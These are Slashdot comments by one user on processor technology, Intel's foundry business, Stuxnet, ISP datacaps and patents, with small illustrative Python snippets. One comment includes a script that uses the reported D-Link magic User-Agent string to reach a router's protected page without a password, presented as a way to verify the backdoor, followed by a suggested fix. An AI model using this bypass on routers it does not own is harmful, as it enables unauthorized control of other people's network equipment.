Comment Re:AMD may benefit (Score 1) 59

You're right: graphene is probably the future, if the [zero] bandgap problem can be solved. There was an article on /. recently indicating that somebody had made a breakthrough there. In the interim, graphene might be useful for replacing the copper/aluminum intrachip interconnect.

A graphene processor running at 100 GHz would [probably] outperform a 32-core x86. Initially, a graphene chip would probably have far fewer gates, so a true RISC ISA [like ARM] would be the logical choice. It could run x86 in software emulation (e.g. QEMU) and still beat the pants off the best Intel offering. Yum.
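
For the unfamiliar, software emulation is at heart a fetch-decode-execute loop. Here's a minimal Python sketch of the idea using a made-up toy ISA [real emulators like QEMU use dynamic binary translation rather than simple interpretation, so treat this as illustration only]:

    # Toy fetch-decode-execute loop illustrating software emulation.
    # Hypothetical 3-instruction ISA, nothing like real x86 emulation.
    def emulate(program):
        regs = [0] * 4                   # four general-purpose registers
        pc = 0                           # program counter
        while pc < len(program):
            op, a, b = program[pc]       # fetch + decode
            if op == "li":               # load immediate: regs[a] = b
                regs[a] = b
            elif op == "add":            # regs[a] += regs[b]
                regs[a] += regs[b]
            elif op == "jnz":            # jump to index b if regs[a] != 0
                if regs[a] != 0:
                    pc = b
                    continue
            pc += 1
        return regs

    # Count down from 3, accumulating 3+2+1 in r1: expect regs[1] == 6
    prog = [("li", 0, 3), ("li", 1, 0),
            ("add", 1, 0), ("li", 2, -1), ("add", 0, 2), ("jnz", 0, 2)]
    print(emulate(prog))

The emulation tax is the point: every guest instruction costs many host instructions, which is why the hypothetical graphene chip would need its raw clock advantage to come out ahead.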

As to process/die shrinkage, I, too, have seen the announcements of the end of Moore's Law. They seem to recur at ML's own [2 year] interval. I've also seen articles about techniques to extend ML for the foreseeable future. No worries.

The other part of the puzzle is memory bandwidth. A cache miss [no matter how large the cache (e.g. 12 MB)] slows things down to the point where advances in chip computation speed stall on memory transfers.
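
You can see the effect even from a high-level language. A rough Python sketch [timings are illustrative only; interpreter overhead blunts the gap a C version would show]:

    # Rough illustration of the cache-miss penalty: summing the same
    # array in sequential vs. random order. The random walk defeats the
    # hardware prefetcher and misses cache constantly.
    import array, random, time

    N = 8_000_000                          # 64 MB of 8-byte ints: way past L3
    data = array.array("q", range(N))

    seq_idx = array.array("I", range(N))   # 0, 1, 2, ... (cache friendly)
    rand_idx = array.array("I", seq_idx)
    random.shuffle(rand_idx)               # same indices, scrambled order

    def walk(indices):
        start = time.perf_counter()
        total = 0
        for i in indices:
            total += data[i]
        return time.perf_counter() - start

    print(f"sequential: {walk(seq_idx):.2f}s   random: {walk(rand_idx):.2f}s")

The random walk typically comes out severalfold slower, and nearly all of the difference is memory stalls, not computation.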

For that, we'd need a DRAM replacement like magneto-resistive RAM [or ferroelectric RAM]. MRAM has the same cell size as DRAM, retains data without power, and is at least 10x faster than DRAM. L1 cache is pure static RAM [which has active power draw and a large footprint]. MRAM is as fast as L2 cache.

Hewlett Packard [which has been taking the lead in MRAM development] has a roadmap for MRAM deployment:
- Replace flash memory [and unlike flash, MRAM doesn't "wear out"]
- Replace DRAM
- Replace/eliminate L2 [and L3] cache
- Put MRAM at the heart of an SOC solution
HP is willing to license the tech to anybody who wants it. Unfortunately, the last announcement of any real progress was a while back.

Comment Re:AMD may benefit (Score 2, Interesting) 59

ARM is starting to encroach on x86 in the server space:
- lower data center power requirements
- a 64-bit version is on the way
- a much smaller die footprint.
Intel must do ARM to stay in that game.

ARM would not be Intel's first foray into architectures other than x86 [8080, 8085, 8086, 80186, 80286, 80386, 486, 586, 686]. Remember Itanium [;-)], and also the iAPX 432. The Itanium and the 432 didn't pan out because [the market for] x86 was so strong, but this shows that while Intel is wedded to x86, it isn't slavish about it either. They care more about making chips at a profit than about any given processor architecture. x86 has been a great tool for doing that, but it's just a means to an end for them.

When x86 ceases to be the asset it currently is, Intel will adopt whatever the market demands. The trend points to ARM (vs. SPARC, MIPS, etc.). At this point, [even] Intel can't kill ARM. There is too much demand for it now [it's a better solution for mobile and embedded/hybrid systems and will surpass x86 in the server space in the near future]. Intel is adapting/reacting now, while it has time to do so on its own terms, instead of waiting 10 years and being forced to do it in a panic.

Contrast this with MS and Windoze. MS lost the mobile space race because of its insistence on Windoze. Intel won't make the same mistake, if for no other reason than that it saw what that insistence did to MS.

As to MS, most likely in 10 years we'll see MS/Office running on OSX/iOS, Linux, and Android, with Windows just a fond memory.

Long term, Intel must become a foundry because it will lose its process-generation edge (e.g. 22nm -> 14nm; after 6(?)nm there isn't much room left, and others will catch up).

Intel will make money on this. In the mid-'80s, Intel was selling its first-generation 386 chip for $750. An Intel engineer told me that the same chip was designed to be profitable even if it sold [had to be sold] for $35.

Comment AMD may benefit (Score 2, Interesting) 59

This forces Global Foundries to be more competitive with Intel, which benefits AMD.

GF, TSMC, etc. have been riding the [profitable] curve of being a generation behind. That is, Intel is always a generation [or two] ahead, but it also incurs significant R&D costs to get there. The competitors could wait and get the same results for far less R&D investment. They could do this because Intel wasn't competing with them [by producing ASICs, FPGAs, etc.].

This forces the non-Intel foundries to produce cutting-edge stuff sooner. AMD was a bit chagrined, after spinning off GF, to see it fall back into the TSMC model [making AMD less competitive against Intel].

The benefit for Intel is threefold:
- More ROI from their expensive fabs. Previously, costs were always recovered because the PC market was always expanding. With that market now shrinking, a next-gen Intel fab may need to do piecework to stay profitable.
- Forcing the competition to compete head on [with the increased costs of being first generation], weakening them in the process [pun intended].
- A toe in the water with ARM and the mobile space [Atom notwithstanding] as a hedge against the x86 arch going the way of the dinosaurs [without the stigma to x86 of a full-fledged announcement of direct ARM support].

Comment Re:Interesting quote (Score 1) 46

I think "low yield" was referring to the nature of the over-pressure attack (vs. the rotor speed attack). Or, that things could have been orchestrated to damage/disable all centrifuges at one time [which would have been detected] instead of just increasing the failure rate [which, as Langner pointed out, would confuse/confound the Iranian engineers].

Langner talks a lot about avoiding detection circa 2007, and about that being less of a concern by 2009 [e.g. "now that the program has achieved its objectives, let's shock the world with our cyber attack prowess"].

But, perhaps "uproar" was/became a desired result of Stuxnet. I recently got an email from my local congressman regarding defense against cyber warfare.

So, Stuxnet set back the Iranian program a bit. But, it also got Congress thinking about [read: funding] cyber warfare defense [offense is implied].

"Cyber warfare" [although, perhaps, a legitimate concern in the wake of Stuxnet] also becomes the "bogeyman under the bed" that could provide public justification for more NSA-like intrusion/trickery.

Comment Re:Thanks Google (Score 5, Informative) 249

Sounds like you're logged into gmail when you go to youtube.

Log out [of gmail] first [possibly clearing some cookies] and you'll have no problem. I have a gmail account [but I only access it through POP3/IMAP from Thunderbird--thus, it's never logged in] and I don't have the same problem. I did see the problem once when I was logged into gmail.

If you'd rather not log out of and back into gmail repeatedly, you can create a separate browser profile [in Firefox, at least, via firefox -P] for youtube, etc.

Comment Can this be used for graphene semiconductors? (Score 1, Interesting) 42

The article mentions that one can change the bandgap of a material with the laser. Isn't this what has been holding back graphene semiconductors--that they have a zero bandgap? Could this technique be used to produce practical graphene semiconductors?

Comment Re:Datacaps anyone? (Score 1) 140

Yes. Just artificially dropping some packets (either deliberately or just to implement some notion of quality of service) can be problematic. While an established TCP socket can deal with this, a DNS lookup [which is datagram based] can be severely affected. My ISP implements QoS, and most of the delay I experience is a failed DNS query that must time out and be retried (e.g. I'll wait a minute for a page load, but 55 seconds of that is waiting for the DNS request to succeed).
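
To make the datagram point concrete, here's a rough Python sketch of a hand-rolled DNS A query over UDP [resolver address and timeout values are just examples]. Note that a single dropped packet costs the full timeout before the retry even starts:

    # UDP has no retransmission, so the resolver itself must eat the
    # timeout and retry when a datagram is lost.
    import socket, struct

    def dns_query(name, server="8.8.8.8", timeout=5.0, retries=3):
        # header: id, flags (recursion desired), 1 question, 0 an/ns/ar
        header = struct.pack(">HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
        qname = b"".join(bytes([len(p)]) + p.encode() for p in name.split("."))
        question = qname + b"\x00" + struct.pack(">HH", 1, 1)  # type A, class IN
        packet = header + question

        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(timeout)
        try:
            for attempt in range(1, retries + 1):
                sock.sendto(packet, (server, 53))
                try:
                    reply, _ = sock.recvfrom(512)
                    return reply                 # caller parses the answers
                except socket.timeout:
                    # one lost datagram == `timeout` seconds of dead air
                    print(f"attempt {attempt} timed out, retrying")
            return None
        finally:
            sock.close()

    dns_query("slashdot.org")

TCP would retransmit a lost segment transparently; with UDP, the application layer eats the whole delay itself.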

Dropping packets like that is a way to censor things without doing outright censorship (e.g. blocking Google 100%). It's my belief that when Google was negotiating with the Chinese government about access, they argued strenuously, but in the end, they took the best deal they could get [were offered]. I mean, if Google had taken a stronger stance (e.g. "we won't limit access"), what would the government's response have been (e.g. 100% blockage) and what would the Chinese people's response have been?

Rest assured that your government's artificial push for Baidu was known here in the US, not that we've been able to do much to help. Our government people do talk with Chinese officials about such things [and many more], but your government is usually quite stoic in its responses ;-).

Economic freedom and political freedom are two sides of the same coin. You can't really have one without the other. Note that I'm not talking about capitalism per se. Many European countries have a modified form of socialism, but still have a government that fosters political freedom.

Hopefully, Google's initiative will provide some improvement/relief. Time will tell.

Comment Datacaps anyone? (Score 1) 140

Seems to me the limiting factor will be ISP datacaps.

The ISPs that tend to have them are the ones that also want to deliver content (e.g. U-verse and Comcast, to name a few). Datacaps limit peer-to-peer networks.

A more sinister interpretation is that datacaps limit the amount of traffic that the NSA has to sift through. The ISPs that seem to have the greatest track record of caving to NSLs, etc. are also the ones with datacaps. Coincidence?

Thus, datacaps also apply when one's "friend" routes traffic through one's connection to support a distributed VPN scheme.

Comment Re:Will this stupidity ever end? (Score 1) 228

One of the commenters on the original article ["Julian"] claims to have the router and to have verified the backdoor.

It's not hard to verify. Create a perl/python/whatever program [on a PC] that mimics the "User-Agent:" string and tries to do something that would otherwise be password challenged. If it succeeds, the access method exists [and is exploitable--from the local LAN if nowhere else].
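
A Python sketch of that test [the router address and admin page path are assumptions for illustration; the magic User-Agent is the string reported for this backdoor]:

    # Send a request that would normally demand authentication, once
    # with a normal User-Agent and once with the reported magic string.
    import urllib.request, urllib.error

    ROUTER = "http://192.168.0.1"                 # typical default LAN address
    PAGE = "/bsc_lan.php"                         # hypothetical protected page
    MAGIC_UA = "xmlset_roodkcableoj28840ybtide"   # reported backdoor string

    def fetch(user_agent):
        req = urllib.request.Request(ROUTER + PAGE,
                                     headers={"User-Agent": user_agent})
        try:
            with urllib.request.urlopen(req, timeout=5) as resp:
                return resp.status
        except urllib.error.HTTPError as e:
            return e.code

    print("normal UA ->", fetch("Mozilla/5.0"))   # expect 401 or a login redirect
    print("magic UA  ->", fetch(MAGIC_UA))        # 200 here => backdoor confirmed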

What isn't clear is whether the User-Agent: hack can be used from the router's public IP address vs. just 192.168.x.y [local LAN] or even if 192.168.x.y can be used.

Someone else posted that the hack is used by firmware programs running inside the router to change configuration [which is legitimate for them to do] by sending the request to the web server inside the router. So, it seems the intent was less a backdoor (e.g. where D-Link et al. could remotely take control of the router) and more a way for the router to do its job.

The fact that the User-Agent: string is a funky, password-like string vs. "internal_legitimate_request" indicates that the code author knew it could be exposed on the public/LAN IP addresses and tried to [weakly] mitigate this. The weakness is akin to a shared secret key that anyone can recover by disassembling the code.

A better way might be to add the restriction that such internal requests must also come from a known internal source (e.g. an AF_UNIX [vs. AF_INET] socket, which presumably could not be faked from an external source). But this would take more time to code, more sophistication, and more code space--perhaps deemed not worth it for a $100 router.
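
A minimal Python sketch of that restriction [the socket path and handler are hypothetical]:

    # Internal configuration requests arrive on an AF_UNIX socket, which
    # cannot be reached from the network; the AF_INET HTTP listener keeps
    # demanding authentication as usual.
    import os, socket

    SOCK_PATH = "/tmp/router_internal.sock"   # hypothetical internal endpoint

    def handle_config_change(request):
        print("applying internal config request:", request)

    def serve_internal_requests():
        if os.path.exists(SOCK_PATH):
            os.unlink(SOCK_PATH)
        srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        srv.bind(SOCK_PATH)
        os.chmod(SOCK_PATH, 0o600)            # only local firmware processes
        srv.listen(1)
        while True:
            conn, _ = srv.accept()
            request = conn.recv(4096)
            # No User-Agent check needed: reaching this socket at all
            # proves the request originated inside the router.
            handle_config_change(request)
            conn.close()

    serve_internal_requests()

An AF_UNIX socket lives in the filesystem, so a remote attacker has no way to reach it; file permissions then gate which local processes can.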

Comment Re:Sure, it's good today (Score 1) 415

Lament the hobbling of innovation by an incompetent patent office.

Agreed.

But, in fairness to them, it isn't just competence; they're also [very] understaffed. They have a [huge] backlog which they've been tasked [by Congress?] with reducing. Unfortunately, if they deny a patent, the inventor may refile. Deny again, refile again, ... The only way for them to truly clear the backlog is to approve the patent. This kicks frivolous patents into the court system--which may have less expertise but more resources [jury pools, appellate courts, etc.]. Not the right thing to do, but possibly understandable.

I have some hope for the "America Invents Act". This makes it easier for interested third parties to dig up prior art and submit it to the USPTO and trigger a reexamination. Crowdsourcing by experts in a given field may help stem the tide. But, further legislation is probably required (e.g. outlawing software patents). And, I say this as a programmer.

With some poetic justice/irony, Apple has lost its iOS "rubber banding" patent in the EU due to a recent German court decision [reported on Slashdot, I believe]. This is because Steve Jobs demonstrated the rubber-banding feature at a conference and said "Boy, have we got it patented", while the actual patent application was dated a few months later. While this is okay in the US, in the EU such a [public] disclosure before the patent is filed nullifies the patent [Steve's talk is considered prior art].
